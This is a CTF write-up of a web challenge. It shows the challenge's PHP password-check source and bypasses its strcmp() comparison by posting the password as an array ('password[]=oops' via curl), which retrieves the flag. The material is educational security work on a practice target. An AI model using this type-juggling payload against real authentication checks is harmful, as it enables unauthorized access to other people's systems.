Web – 208 pts (24 solves) – Chall author: eljoselillo7
Simple web challenge where we need to bypass the PHP strcmp() function.
Challenge
Solution
The website asks us for a password, nothing more, nothing less. By using the browser inspect tool (F-12) we see it posts our input to check.php. It also tells us they have made the PHP file available to us, so of course, we take a look :).
<?php
$FLAG = (file_get_contents("/flag.txt")); //SECRET
$PASSWORD = $_POST['password']; //User password
if(isset($PASSWORD)){
$PASSWORD = str_replace("s4cuRe_p4sW0rD","Nice_try!",$PASSWORD); //Replace
if(strcmp('s4cuRe_p4sW0rD', $PASSWORD) == 0){ //Check
echo $FLAG;
}
else{
header("Location: /fail.html");
die();
}
}
else {
echo "Give me what I'm looking for ):";
}
?>
So the correct password is ‘s4cuRe_p4sW0rD’, but they filter it out of our responses, how cheeky :c. Fortunately, or rather unfortunately, there is a vulnerability to the PHP strcmp functions. If instead of a string, we pass on something PHP recognises as a list it will return True, regardless of our input :).
I first tried to use HTML by going to the link
http://167.99.129.209:8000/check.php?password[]=oops
However, this did not work so I used curl instead
$ curl -d password[]=oops 167.99.129.209:8000/check.php
which happily returns our desired flag
NETON{arrays_FOR_the_WIN!}